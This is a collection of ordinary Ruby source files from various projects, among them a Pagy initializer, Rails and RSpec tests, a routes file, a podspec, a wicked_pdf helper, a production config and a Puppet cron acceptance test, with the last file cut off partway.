Dataset schema (each record below repeats these fields, with the file content last):
  hexsha             string, length 40
  size               int64, 2 to 1.01M
  content            string, length 2 to 1.01M
  avg_line_length    float64, 1.5 to 100
  max_line_length    int64, 2 to 1k
  alphanum_fraction  float64, 0.25 to 1
hexsha: ab3c87d0f1bef40036609353d2be1ca1e7636a18 | size: 7,676 | avg_line_length: 42.40884 | max_line_length: 128 | alphanum_fraction: 0.706748
content:

# frozen_string_literal: true

# Pagy initializer file (4.7.1)
# Customize only what you really need and notice that Pagy works also without any of the following lines.
# Should you just cherry pick part of this file, please maintain the require-order of the extras

# Pagy Variables
# See https://ddnexus.github.io/pagy/api/pagy#variables
# All the Pagy::VARS are set for all the Pagy instances but can be overridden
# per instance by just passing them to Pagy.new or the #pagy controller method

# Instance variables
# See https://ddnexus.github.io/pagy/api/pagy#instance-variables
# Pagy::VARS[:page]   = 1    # default
# Pagy::VARS[:items]  = 20   # default
# Pagy::VARS[:outset] = 0    # default

# Other Variables
# See https://ddnexus.github.io/pagy/api/pagy#other-variables
# Pagy::VARS[:size]       = [1,4,4,1]                  # default
# Pagy::VARS[:page_param] = :page                      # default
# Pagy::VARS[:params]     = {}                         # default
# Pagy::VARS[:fragment]   = '#fragment'                # example
# Pagy::VARS[:link_extra] = 'data-remote="true"'       # example
# Pagy::VARS[:i18n_key]   = 'pagy.item_name'           # default
# Pagy::VARS[:cycle]      = true                       # example

# Extras
# See https://ddnexus.github.io/pagy/extras

# Backend Extras

# Array extra: Paginate arrays efficiently, avoiding expensive array-wrapping and without overriding
# See https://ddnexus.github.io/pagy/extras/array
# require 'pagy/extras/array'

# Countless extra: Paginate without any count, saving one query per rendering
# See https://ddnexus.github.io/pagy/extras/countless
# require 'pagy/extras/countless'

# Elasticsearch Rails extra: Paginate `ElasticsearchRails::Results` objects
# See https://ddnexus.github.io/pagy/extras/elasticsearch_rails
# default :pagy_search method: change only if you use
# also the searchkick extra that defines the same
# VARS[:elasticsearch_rails_search_method] = :pagy_search
# require 'pagy/extras/elasticsearch_rails'

# Searchkick extra: Paginate `Searchkick::Results` objects
# See https://ddnexus.github.io/pagy/extras/searchkick
# default :pagy_search method: change only if you use
# also the elasticsearch_rails extra that defines the same
# VARS[:searchkick_search_method] = :pagy_search
# require 'pagy/extras/searchkick'

# Frontend Extras

# Bootstrap extra: Add nav, nav_js and combo_nav_js helpers and templates for Bootstrap pagination
# See https://ddnexus.github.io/pagy/extras/bootstrap
# require 'pagy/extras/bootstrap'

# Bulma extra: Add nav, nav_js and combo_nav_js helpers and templates for Bulma pagination
# See https://ddnexus.github.io/pagy/extras/bulma
# require 'pagy/extras/bulma'

# Foundation extra: Add nav, nav_js and combo_nav_js helpers and templates for Foundation pagination
# See https://ddnexus.github.io/pagy/extras/foundation
# require 'pagy/extras/foundation'

# Materialize extra: Add nav, nav_js and combo_nav_js helpers for Materialize pagination
# See https://ddnexus.github.io/pagy/extras/materialize
# require 'pagy/extras/materialize'

# Navs extra: Add nav_js and combo_nav_js javascript helpers
# Notice: the other frontend extras add their own framework-styled versions,
# so require this extra only if you need the unstyled version
# See https://ddnexus.github.io/pagy/extras/navs
# require 'pagy/extras/navs'

# Semantic extra: Add nav, nav_js and combo_nav_js helpers for Semantic UI pagination
# See https://ddnexus.github.io/pagy/extras/semantic
# require 'pagy/extras/semantic'

# UIkit extra: Add nav helper and templates for UIkit pagination
# See https://ddnexus.github.io/pagy/extras/uikit
# require 'pagy/extras/uikit'

# Multi size var used by the *_nav_js helpers
# See https://ddnexus.github.io/pagy/extras/navs#steps
# Pagy::VARS[:steps] = { 0 => [2,3,3,2], 540 => [3,5,5,3], 720 => [5,7,7,5] }   # example

# Feature Extras

# Headers extra: http response headers (and other helpers) useful for API pagination
# See http://ddnexus.github.io/pagy/extras/headers
# require 'pagy/extras/headers'
# Pagy::VARS[:headers] = { page: 'Current-Page', items: 'Page-Items', count: 'Total-Count', pages: 'Total-Pages' }   # default

# Support extra: Extra support for features like: incremental, infinite, auto-scroll pagination
# See https://ddnexus.github.io/pagy/extras/support
# require 'pagy/extras/support'

# Items extra: Allow the client to request a custom number of items per page with an optional selector UI
# See https://ddnexus.github.io/pagy/extras/items
# require 'pagy/extras/items'
# Pagy::VARS[:items_param] = :items    # default
# Pagy::VARS[:max_items]   = 100       # default
# set to false if you want to make :enable_items_extra an opt-in variable
# Pagy::VARS[:enable_items_extra] = false    # default true

# Overflow extra: Allow for easy handling of overflowing pages
# See https://ddnexus.github.io/pagy/extras/overflow
# require 'pagy/extras/overflow'
# Pagy::VARS[:overflow] = :empty_page    # default  (other options: :last_page and :exception)

# Metadata extra: Provides the pagination metadata to Javascript frameworks like Vue.js, react.js, etc.
# See https://ddnexus.github.io/pagy/extras/metadata
# you must require the shared internal extra (BEFORE the metadata extra) ONLY if you need also the :sequels
# require 'pagy/extras/shared'
# require 'pagy/extras/metadata'
# For performance reason, you should explicitly set ONLY the metadata you use in the frontend
# Pagy::VARS[:metadata] = [:scaffold_url, :count, :page, :prev, :next, :last]    # example

# Trim extra: Remove the page=1 param from links
# See https://ddnexus.github.io/pagy/extras/trim
# require 'pagy/extras/trim'
# after requiring it will trim by default
# set to false if you want to make :enable_trim_extra an opt-in variable
# Pagy::VARS[:enable_trim_extra] = false    # default true

# Rails

# Rails: extras assets path required by the helpers that use javascript
# (pagy*_nav_js, pagy*_combo_nav_js, and pagy_items_selector_js)
# See https://ddnexus.github.io/pagy/extras#javascript
# Rails.application.config.assets.paths << Pagy.root.join('javascripts')

# I18n

# Pagy internal I18n: ~18x faster using ~10x less memory than the i18n gem
# See https://ddnexus.github.io/pagy/api/frontend#i18n
# Notice: No need to configure anything in this section if your app uses only "en"
# or if you use the i18n extra below
#
# Examples:
# load the "de" built-in locale:
# Pagy::I18n.load(locale: 'de')
#
# load the "de" locale defined in the custom file at :filepath:
# Pagy::I18n.load(locale: 'de', filepath: 'path/to/pagy-de.yml')
#
# load the "de", "en" and "es" built-in locales:
# (the first passed :locale will be used also as the default_locale)
# Pagy::I18n.load({locale: 'de'},
#                 {locale: 'en'},
#                 {locale: 'es'})
#
# load the "en" built-in locale, a custom "es" locale,
# and a totally custom locale complete with a custom :pluralize proc:
# (the first passed :locale will be used also as the default_locale)
# Pagy::I18n.load({locale: 'en'},
#                 {locale: 'es', filepath: 'path/to/pagy-es.yml'},
#                 {locale: 'xyz',  # not built-in
#                  filepath: 'path/to/pagy-xyz.yml',
#                  pluralize: lambda{|count| ... } )

# I18n extra: uses the standard i18n gem which is ~18x slower using ~10x more memory
# than the default pagy internal i18n (see above)
# See https://ddnexus.github.io/pagy/extras/i18n
# require 'pagy/extras/i18n'

# Default i18n key
# Pagy::VARS[:i18n_key] = 'pagy.item_name'   # default
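The initializer above only sets defaults; the actual pagination happens in a controller and view. A minimal sketch of typical Pagy usage under these defaults (the Product model and items value are illustrative, not part of the file above):

# app/controllers/products_controller.rb -- hypothetical controller for illustration
class ProductsController < ApplicationController
  include Pagy::Backend

  def index
    # The :items option overrides Pagy::VARS[:items] for this instance only.
    @pagy, @products = pagy(Product.all, items: 10)
  end
end

# app/helpers/application_helper.rb
module ApplicationHelper
  include Pagy::Frontend   # provides pagy_nav, pagy_info, etc.
end

# app/views/products/index.html.erb would then render the nav bar with:
#   <%== pagy_nav(@pagy) %>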
hexsha: e27d9ed255ed9fc5ae7f07ce758f071369128c15 | size: 1,064 | avg_line_length: 21.28 | max_line_length: 88 | alphanum_fraction: 0.68609
content:

require 'test_helper'

class Attr3sControllerTest < ActionController::TestCase
  setup do
    @attr3 = attr3s(:one)
  end

  test "should get index" do
    get :index
    assert_response :success
    assert_not_nil assigns(:attr3s)
  end

  test "should get new" do
    get :new
    assert_response :success
  end

  test "should create attr3" do
    assert_difference('Attr3.count') do
      post :create, attr3: { name: @attr3.name, tenant_id: @attr3.tenant_id }
    end

    assert_redirected_to attr3_path(assigns(:attr3))
  end

  test "should show attr3" do
    get :show, id: @attr3
    assert_response :success
  end

  test "should get edit" do
    get :edit, id: @attr3
    assert_response :success
  end

  test "should update attr3" do
    patch :update, id: @attr3, attr3: { name: @attr3.name, tenant_id: @attr3.tenant_id }
    assert_redirected_to attr3_path(assigns(:attr3))
  end

  test "should destroy attr3" do
    assert_difference('Attr3.count', -1) do
      delete :destroy, id: @attr3
    end

    assert_redirected_to attr3s_path
  end
end
hexsha: e237e45654c837090aef70a3e906ba9f2e0653dc | size: 426 | avg_line_length: 23.666667 | max_line_length: 70 | alphanum_fraction: 0.706573
content:

# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.

module Azure::KeyVault::V2015_06_01
  module Models
    #
    # Defines values for JsonWebKeyEncryptionAlgorithm
    #
    module JsonWebKeyEncryptionAlgorithm
      RSAOAEP = "RSA-OAEP"
      RSAOAEP256 = "RSA-OAEP-256"
      RSA15 = "RSA1_5"
    end
  end
end
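The enum values are plain strings, so callers can reference the constants wherever the SDK expects a JSON Web Key encryption algorithm name. A trivial illustration, assuming the generated SDK files are loaded:

algorithm = Azure::KeyVault::V2015_06_01::Models::JsonWebKeyEncryptionAlgorithm::RSAOAEP256
puts algorithm  # => "RSA-OAEP-256"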
hexsha: e94aa3628e7d23aaf9b965ec170fca8a24459b8c | size: 373 | avg_line_length: 26.642857 | max_line_length: 76 | alphanum_fraction: 0.753351
content:

require_relative '../automated_init'

context "Data Structure" do
  test "Is a Schema object" do
    ancestors = Schema::Controls::DataStructure.ancestors

    assert(ancestors.include? Schema)
  end

  test "Can configure its dependencies" do
    example = Schema::Controls::DataStructure::ConfigureDependencies.example

    assert(example.some_dependency = :set)
  end
end
hexsha: 089304ed4a4f409435e4ea8ad3372615f272efa3 | size: 457 | avg_line_length: 19.869565 | max_line_length: 70 | alphanum_fraction: 0.691466
content:

require 'benchmark/ips'
require 'benchmark/ipsa'
require 'sentry-raven-without-integrations'

Raven.configure do |config|
  config.logger = Logger.new(nil)
  config.dsn = "dummy://12345:[email protected]:3000/sentry/42"
end

exception = begin
              1/0
            rescue => e
              e
            end

Raven.capture_exception(exception)

report = MemoryProfiler.report do
  Raven.capture_exception(exception)
end

report.pretty_print
hexsha: bf7f25cb8d01be92fe3f70030f729b56c0ab023d | size: 1,812 | avg_line_length: 31.241379 | max_line_length: 85 | alphanum_fraction: 0.612583
content:

require 'spec_helper'

describe Volunteer do
  describe '#name' do
    it 'returns the name of the volunteer' do
      test_volunteer = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
      expect(test_volunteer.name).to eq 'Jane'
    end
  end

  describe '#project_id' do
    it 'returns the project_id of the volunteer' do
      test_volunteer = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
      expect(test_volunteer.project_id).to eq 1
    end
  end
  #
  describe '#==' do
    it 'checks for equality based on the name of a volunteer' do
      volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
      volunteer2 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
      expect(volunteer1 == volunteer2).to eq true
    end
  end
  #
  context '.all' do
    it 'is empty to start' do
      expect(Volunteer.all).to eq []
    end
    #
    it 'returns all volunteers' do
      volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
      volunteer1.save
      volunteer2 = Volunteer.new({:name => 'Joe', :project_id => 1, :id => nil})
      volunteer2.save
      expect(Volunteer.all).to eq [volunteer1, volunteer2]
    end
  end
  #
  describe '#save' do
    it 'adds a volunteer to the database' do
      volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
      volunteer1.save
      expect(Volunteer.all).to eq [volunteer1]
    end
  end
  #
  describe '.find' do
    it 'returns a volunteer by id' do
      volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
      volunteer1.save
      volunteer2 = Volunteer.new({:name => 'Joe', :project_id => 1, :id => nil})
      volunteer2.save
      expect(Volunteer.find(volunteer1.id)).to eq volunteer1
    end
  end
end
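The spec implies the Volunteer interface (#name, #project_id, #==, #save, .all, .find). A minimal in-memory sketch that would satisfy most of it; the original project presumably backs these methods with a database and resets state between examples:

class Volunteer
  attr_reader :name, :project_id, :id

  @@volunteers = []

  def initialize(attributes)
    @name = attributes[:name]
    @project_id = attributes[:project_id]
    @id = attributes[:id]
  end

  # Per the spec, equality is based on the volunteer's name.
  def ==(other_volunteer)
    name == other_volunteer.name
  end

  def save
    @id = @@volunteers.length + 1
    @@volunteers << self
    self
  end

  def self.all
    @@volunteers
  end

  def self.find(id)
    @@volunteers.find { |volunteer| volunteer.id == id }
  end
end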
hexsha: 79535fd50c404ed11610dda1953cebbad675eabb | size: 2,126 | avg_line_length: 37.298246 | max_line_length: 78 | alphanum_fraction: 0.765757
content:

#--
# Project:   google_checkout4r
# File:      test/unit/carrier_calculated_shipping_test.rb
# Author:    Tony Chan <api.htchan at gmail dot com>
# Copyright: (c) 2007 by Manuel Holtgrewe
# License:   MIT License as follows:
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#++

require File.expand_path(File.dirname(__FILE__)) + '/../test_helper'

require 'google4r/checkout'

require 'test/frontend_configuration'

# Test for the FlatRateShipping class.
class Google4R::Checkout::CarrierCalculatedShippingTest < Test::Unit::TestCase
  include Google4R::Checkout

  def setup
    @shipping = CarrierCalculatedShipping.new
  end

  def test_carrier_calculated_shipping_method_behaves_correctly
    [ :carrier_calculated_shipping_options, :shipping_packages,
      :create_carrier_calculated_shipping_option, :create_shipping_package,
      :create_from_element
    ].each do |symbol|
      assert_respond_to @shipping, symbol
    end
  end

  def test_initialization
    assert_equal [], @shipping.carrier_calculated_shipping_options
    assert_equal [], @shipping.shipping_packages
  end
end
hexsha: 18605fface1f7afe833dd107108cb7a3d25a501a | size: 799 | avg_line_length: 31.96 | max_line_length: 71 | alphanum_fraction: 0.624531
content:

Rails.application.routes.draw do
  root 'static_pages#home'
  get '/help', to: 'static_pages#help'
  get '/about', to: 'static_pages#about'
  get '/contact', to: 'static_pages#contact'
  get '/signup', to: 'users#new'
  get '/login', to: 'sessions#new'
  get '/blocked_users', to: 'blocked_users#index'
  post '/login', to: 'sessions#create'
  delete '/logout', to: 'sessions#destroy'
  resources :users do
    member do
      get :following, :followers
      get :block
      put :block
      put :unblock
    end
  end
  resources :account_activations, only: [:edit]
  resources :password_resets, only: [:new, :create, :edit, :update]
  resources :microposts, only: [:create, :destroy]
  resources :relationships, only: [:create, :destroy]
end
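For reference, a few of the named URL helpers this routes file generates; the paths shown are what the Rails router would produce for these definitions:

# Illustrative helpers generated by the routes above:
#   root_path                               # => "/"
#   login_path                              # => "/login"
#   signup_path                             # => "/signup"
#   following_user_path(1)                  # => "/users/1/following"
#   block_user_path(1)                      # => "/users/1/block"  (matched by both GET and PUT)
#   edit_account_activation_path("token")   # => "/account_activations/token/edit"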
hexsha: 4af72f5d2f4a1eb19de29f143ef73eb3ae8a0beb | size: 762 | avg_line_length: 23.8125 | max_line_length: 65 | alphanum_fraction: 0.695538
content:

# typed: false
require 'spec_helper'

require 'ddtrace/profiling/transport/parcel'

RSpec.describe Datadog::Profiling::Transport::Parcel do
  subject(:parcel) { described_class.new(data) }

  let(:data) { instance_double(Array) }

  it { is_expected.to be_a_kind_of(Datadog::Transport::Parcel) }

  describe '#initialize' do
    it { is_expected.to have_attributes(data: data) }
  end

  describe '#encode_with' do
    subject(:encode_with) { parcel.encode_with(encoder) }

    let(:encoder) { instance_double(Datadog::Encoding::Encoder) }
    let(:encoded_data) { double('encoded data') }

    before do
      expect(encoder).to receive(:encode)
        .with(data)
        .and_return(encoded_data)
    end

    it { is_expected.to be encoded_data }
  end
end
hexsha: bfb6c589bb464592994ef46da0bd200d50e67130 | size: 60 | avg_line_length: 30 | max_line_length: 59 | alphanum_fraction: 0.716667
content:

json.extract! @domain, :id, :name, :created_at, :updated_at
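This Jbuilder one-liner copies the listed attributes from @domain into the JSON response. It is roughly equivalent to the hand-written version below; the example output values are illustrative only:

# Hand-written equivalent of json.extract!:
json.id         @domain.id
json.name       @domain.name
json.created_at @domain.created_at
json.updated_at @domain.updated_at

# Example rendered output for one domain record (values illustrative):
# {"id":1,"name":"example.com","created_at":"2021-01-01T00:00:00.000Z","updated_at":"2021-01-01T00:00:00.000Z"}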
hexsha: 912cd9bc4e621dbd2686bb9377a94e53556ede85 | size: 1,762 | avg_line_length: 39.155556 | max_line_length: 108 | alphanum_fraction: 0.642452
content:

#
# Be sure to run `pod lib lint TGCore.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#

Pod::Spec.new do |s|
  s.name             = 'TGCore'
  s.version          = '0.1.1'
  s.summary          = 'This is a pod with a MVVM skeleton that helps to start swiftUI projects'

  # This description is used to generate tags and improve search results.
  #   * Think: What does it do? Why did you write it? What is the focus?
  #   * Try to keep it short, snappy and to the point.
  #   * Write the description between the DESC delimiters below.
  #   * Finally, don't worry about the indent, CocoaPods strips it!

  s.description      = <<-DESC
  A pod for my own use MVVM example. This is a pod with a MVVM skeleton that helps to start swiftUI projects
                       DESC

  s.homepage         = 'https://github.com/alexdelgadodiaz/mypod'
  # s.screenshots     = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
  s.license          = { :type => 'MIT', :file => 'LICENSE' }
  s.author           = { 'Alejandro Delgado' => '[email protected]' }
  s.source           = { :git => 'https://github.com/Alejandro Delgado/TGCore.git', :tag => s.version.to_s }
  # s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'

  s.ios.deployment_target = '13.0'
  s.swift_versions = '5.1'

  s.source_files = 'TGCore/Classes/**/*'

  # s.resource_bundles = {
  #   'TGCore' => ['TGCore/Assets/*.png']
  # }

  # s.public_header_files = 'Pod/Classes/**/*.h'
  # s.frameworks = 'UIKit', 'MapKit'
  # s.dependency 'Parse', '~> 2.3'
  s.dependency 'Parse', '~> 1.17.3'
end
hexsha: 6a7581fa52fd740206556747c7250cf109f8bdd7 | size: 192 | avg_line_length: 24 | max_line_length: 45 | alphanum_fraction: 0.734375
content:

require 'rails_helper'

RSpec.describe Activity, type: :model do
  it { should belong_to(:user) }
  it { should validate_presence_of(:kind) }
  it { should validate_presence_of(:amount) }
end
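These shoulda-matchers expectations imply a model along the following lines; this is a sketch, and the column types or any additional validations in the real app are assumptions:

# app/models/activity.rb -- minimal model the spec above would pass against
class Activity < ApplicationRecord
  belongs_to :user

  validates :kind, presence: true
  validates :amount, presence: true
end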
hexsha: 625ef63abbc08109e674e6529555146189750e13 | size: 3,677 | avg_line_length: 38.705263 | max_line_length: 245 | alphanum_fraction: 0.655426
content:

module PdfHelper
  require 'wicked_pdf'
  require 'wicked_pdf_tempfile'

  def self.included(base)
    # Protect from trying to augment modules that appear
    # as the result of adding other gems.
    return if base != ActionController::Base
    base.class_eval do
      alias_method_chain :render, :wicked_pdf
      alias_method_chain :render_to_string, :wicked_pdf
      after_filter :clean_temp_files
    end
  end

  def render_with_wicked_pdf(options = nil, *args, &block)
    if options.is_a?(Hash) && options.has_key?(:pdf)
      log_pdf_creation
      options[:basic_auth] = set_basic_auth(options)
      make_and_send_pdf(options.delete(:pdf), (WickedPdf.config || {}).merge(options))
    else
      render_without_wicked_pdf(options, *args, &block)
    end
  end

  def render_to_string_with_wicked_pdf(options = nil, *args, &block)
    if options.is_a?(Hash) && options.has_key?(:pdf)
      log_pdf_creation
      options[:basic_auth] = set_basic_auth(options)
      options.delete :pdf
      make_pdf((WickedPdf.config || {}).merge(options))
    else
      render_to_string_without_wicked_pdf(options, *args, &block)
    end
  end

  private

  def log_pdf_creation
    logger.info '*'*15 + 'WICKED' + '*'*15
  end

  def set_basic_auth(options={})
    options[:basic_auth] ||= WickedPdf.config.fetch(:basic_auth){ false }
    if options[:basic_auth] && request.env["HTTP_AUTHORIZATION"]
      request.env["HTTP_AUTHORIZATION"].split(" ").last
    end
  end

  def clean_temp_files
    if defined?(@hf_tempfiles)
      @hf_tempfiles.each { |tf| tf.close! }
    end
  end

  def make_pdf(options = {})
    html_string = render_to_string(:template => options[:template],
                                   :layout => options[:layout],
                                   :formats => options[:formats],
                                   :handlers => options[:handlers])
    options = prerender_header_and_footer(options)
    w = WickedPdf.new(options[:wkhtmltopdf])
    w.pdf_from_string(html_string, options)
  end

  def make_and_send_pdf(pdf_name, options={})
    options[:wkhtmltopdf] ||= nil
    options[:layout] ||= false
    options[:template] ||= File.join(controller_path, action_name)
    options[:disposition] ||= "inline"
    if options[:show_as_html]
      render :template => options[:template],
             :layout => options[:layout],
             :formats => options[:formats],
             :handlers => options[:handlers],
             :content_type => "text/html"
    else
      pdf_content = make_pdf(options)
      File.open(options[:save_to_file], 'wb') {|file| file << pdf_content } if options[:save_to_file]
      send_data(pdf_content, :filename => pdf_name + '.pdf', :type => 'application/pdf', :disposition => options[:disposition]) unless options[:save_only]
    end
  end

  # Given an options hash, prerenders content for the header and footer sections
  # to temp files and return a new options hash including the URLs to these files.
  def prerender_header_and_footer(options)
    [:header, :footer].each do |hf|
      if options[hf] && options[hf][:html] && options[hf][:html][:template]
        @hf_tempfiles = [] if ! defined?(@hf_tempfiles)
        @hf_tempfiles.push( tf=WickedPdfTempfile.new("wicked_#{hf}_pdf.html") )
        options[hf][:html][:layout] ||= options[:layout]
        tf.write render_to_string(:template => options[hf][:html][:template],
                                  :layout => options[hf][:html][:layout],
                                  :locals => options[hf][:html][:locals],
                                  :formats => options[hf][:html][:formats],
                                  :handlers => options[hf][:html][:handlers])
        tf.flush
        options[hf][:html].delete(:template)
        options[hf][:html][:url] = "file://#{tf.path}"
      end
    end
    options
  end
end
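Once this module is mixed into ActionController::Base, a controller triggers PDF rendering simply by passing a :pdf key to render, which render_with_wicked_pdf intercepts. A minimal sketch; the controller, model, template and layout names are illustrative:

class InvoicesController < ApplicationController
  def show
    @invoice = Invoice.find(params[:id])

    respond_to do |format|
      format.html
      format.pdf do
        # The :pdf key routes this call through render_with_wicked_pdf above.
        render :pdf          => "invoice_#{@invoice.id}",
               :template     => 'invoices/show',
               :layout       => 'pdf',
               :disposition  => 'attachment',
               :show_as_html => params.key?(:debug)   # render plain HTML for debugging
      end
    end
  end
end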
hexsha: 7a86229539270d7aa53f7c2d1533c67b710886b8 | size: 5,018 | avg_line_length: 44.40708 | max_line_length: 114 | alphanum_fraction: 0.762654
content:

Rails.application.configure do
  # Settings specified here will take precedence over those in config/application.rb.

  # Code is not reloaded between requests.
  config.cache_classes = true

  # Eager load code on boot. This eager loads most of Rails and
  # your application in memory, allowing both threaded web servers
  # and those relying on copy on write to perform better.
  # Rake tasks automatically ignore this option for performance.
  config.eager_load = true

  # Full error reports are disabled and caching is turned on.
  config.consider_all_requests_local       = false
  config.action_controller.perform_caching = true

  # Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
  # or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
  # config.require_master_key = true

  # Disable serving static files from the `/public` folder by default since
  # Apache or NGINX already handles this.
  config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?

  # Compress CSS using a preprocessor.
  # config.assets.css_compressor = :sass

  # Do not fallback to assets pipeline if a precompiled asset is missed.
  config.assets.compile = false

  # Enable serving of images, stylesheets, and JavaScripts from an asset server.
  # config.action_controller.asset_host = 'http://assets.example.com'

  # Specifies the header that your server uses for sending files.
  # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
  # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX

  # Store uploaded files on the local file system (see config/storage.yml for options).
  config.active_storage.service = :local

  # Mount Action Cable outside main process or domain.
  # config.action_cable.mount_path = nil
  # config.action_cable.url = 'wss://example.com/cable'
  # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]

  # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
  # config.force_ssl = true

  # Use the lowest log level to ensure availability of diagnostic information
  # when problems arise.
  config.log_level = :debug

  # Prepend all log lines with the following tags.
  config.log_tags = [ :request_id ]

  # Use a different cache store in production.
  # config.cache_store = :mem_cache_store

  # Use a real queuing backend for Active Job (and separate queues per environment).
  # config.active_job.queue_adapter     = :resque
  # config.active_job.queue_name_prefix = "Relaxation_Parlor_production"

  config.action_mailer.perform_caching = false

  # Ignore bad email addresses and do not raise email delivery errors.
  # Set this to true and configure the email server for immediate delivery to raise delivery errors.
  # config.action_mailer.raise_delivery_errors = false

  # Enable locale fallbacks for I18n (makes lookups for any locale fall back to
  # the I18n.default_locale when a translation cannot be found).
  config.i18n.fallbacks = true

  # Send deprecation notices to registered listeners.
  config.active_support.deprecation = :notify

  # Use default logging formatter so that PID and timestamp are not suppressed.
  config.log_formatter = ::Logger::Formatter.new

  # Use a different logger for distributed setups.
  # require 'syslog/logger'
  # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')

  if ENV["RAILS_LOG_TO_STDOUT"].present?
    logger           = ActiveSupport::Logger.new(STDOUT)
    logger.formatter = config.log_formatter
    config.logger    = ActiveSupport::TaggedLogging.new(logger)
  end

  # Do not dump schema after migrations.
  config.active_record.dump_schema_after_migration = false

  # Inserts middleware to perform automatic connection switching.
  # The `database_selector` hash is used to pass options to the DatabaseSelector
  # middleware. The `delay` is used to determine how long to wait after a write
  # to send a subsequent read to the primary.
  #
  # The `database_resolver` class is used by the middleware to determine which
  # database is appropriate to use based on the time delay.
  #
  # The `database_resolver_context` class is used by the middleware to set
  # timestamps for the last write to the primary. The resolver uses the context
  # class timestamps to determine how long to wait before reading from the
  # replica.
  #
  # By default Rails will store a last write timestamp in the session. The
  # DatabaseSelector middleware is designed as such you can define your own
  # strategy for connection switching and pass that into the middleware through
  # these configuration options.
  # config.active_record.database_selector = { delay: 2.seconds }
  # config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
  # config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
hexsha: 01ba6efc5310e5c7d09fa586ab9d5435c8f4f521 | size: 1,438 | avg_line_length: 27.132075 | max_line_length: 87 | alphanum_fraction: 0.689152
content:

# frozen_string_literal: true
require 'spec_helper'

RSpec.describe 'capybara/rspec', :type => :feature do
  it "should include Capybara in rspec" do
    visit('/foo')
    expect(page.body).to include('Another World')
  end

  context "resetting session" do
    it "sets a cookie in one example..." do
      visit('/set_cookie')
      expect(page.body).to include('Cookie set to test_cookie')
    end

    it "...then it is not available in the next" do
      visit('/get_cookie')
      expect(page.body).not_to include('test_cookie')
    end
  end

  context "setting the current driver" do
    it "sets the current driver in one example..." do
      Capybara.current_driver = :selenium
    end

    it "...then it has returned to the default in the next example" do
      expect(Capybara.current_driver).to eq(:rack_test)
    end
  end

  it "switches to the javascript driver when giving it as metadata", js: true do
    expect(Capybara.current_driver).to eq(Capybara.javascript_driver)
  end

  it "switches to the given driver when giving it as metadata", :driver => :culerity do
    expect(Capybara.current_driver).to eq(:culerity)
  end
end

RSpec.describe 'capybara/rspec', :type => :other do
  it "should not include Capybara" do
    expect { visit('/') }.to raise_error(NoMethodError)
  end
end

feature "Feature DSL" do
  scenario "is pulled in" do
    visit('/foo')
    expect(page.body).to include('Another World')
  end
end
hexsha: f7f64233a79edfb6aa802d2aeae330a8ffa9bb29 | size: 937 | avg_line_length: 29.28125 | max_line_length: 101 | alphanum_fraction: 0.676628
content:

test_name "puppet should match existing job"
confine :except, :platform => 'windows'

require 'puppet/acceptance/common_utils'
extend Puppet::Acceptance::CronUtils

teardown do
  step "Cron: cleanup"
  agents.each do |agent|
    clean agent
  end
end

agents.each do |host|
  step "ensure the user exist via puppet"
  setup host

  step "Create the existing cron job by hand..."
  run_cron_on(host,:add,'tstuser',"* * * * * /bin/true")

  step "Apply the resource on the host using puppet resource"
  on(host, puppet_resource("cron", "crontest", "user=tstuser",
                           "command=/bin/true", "ensure=present")) do
    assert_match(/present/, stdout, "Failed creating crontab for tstuser on #{host}")
  end

  step "Verify that crontab -l contains what you expected"
  run_cron_on(host, :list, 'tstuser') do
    assert_match(/\* \* \* \* \* \/bin\/true/, stdout, "Did not find crontab for tstuser on #{host}")
  end
end
hexsha: e898dc35abe597e48739dcb7a24d632d8b357632 | size: 5,596 | avg_line_length: 33.710843 | max_line_length: 123 | alphanum_fraction: 0.696926
content:

require 'vcr'
require 'multi_json'

module VCRHelpers

  def normalize_cassette_hash(cassette_hash)
    cassette_hash['recorded_with'] = "VCR #{VCR.version}"
    cassette_hash['http_interactions'].map! { |h| normalize_http_interaction(h) }
    cassette_hash
  end

  def normalize_headers(object)
    object.headers = {} and return if object.headers.nil?
    object.headers = {}.tap do |hash|
      object.headers.each do |key, value|
        hash[key.downcase] = value
      end
    end
  end

  def static_timestamp
